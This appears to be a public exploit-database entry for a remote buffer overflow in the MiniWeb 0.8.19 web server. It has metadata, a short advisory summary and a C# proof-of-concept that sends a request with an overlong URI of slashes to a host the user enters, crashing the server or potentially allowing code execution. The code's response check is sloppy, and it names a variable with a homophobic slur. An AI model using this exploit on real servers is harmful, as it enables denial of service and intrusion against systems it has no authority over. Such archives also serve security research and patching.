MiniWeb 0.8.19 - Remote Buffer Overflow

Author: e.wiZz!
type: remote
platform: windows
port: 
date_added: 2009-04-16  
date_updated: 2014-04-18  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 32923.cs  
source: https://www.securityfocus.com/bid/34563/info

MiniWeb is prone to a remote buffer-overflow vulnerability.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

/* BoF when requesting URI longer than 120~ */

using System;
using System.IO;
using System.Net;
using System.Text;

namespace idiot
{
    class pf
    {
        static void Main(string[] args)
        {
            Console.Write("Enter host:\n");
            string site = Console.ReadLine();
            string uri = null;
            try
            {
                for (int i = 0; i < 144; i++) { uri += "/"; }
                HttpWebRequest request = (HttpWebRequest)
                    HttpWebRequest.Create(site + uri);
                HttpWebResponse response = (HttpWebResponse)

                    request.GetResponse();

                //any response we get means that exploit failed
                if (response.GetResponseHeader("Content-Lenght") != "a")
                {
                    Console.WriteLine("Exploit failed");
                }

            }
            catch (Exception gayexception)
            {
                Console.WriteLine("Cannot connect");
                Console.WriteLine("{0}", gayexception.Message);
            }
        }
    }
}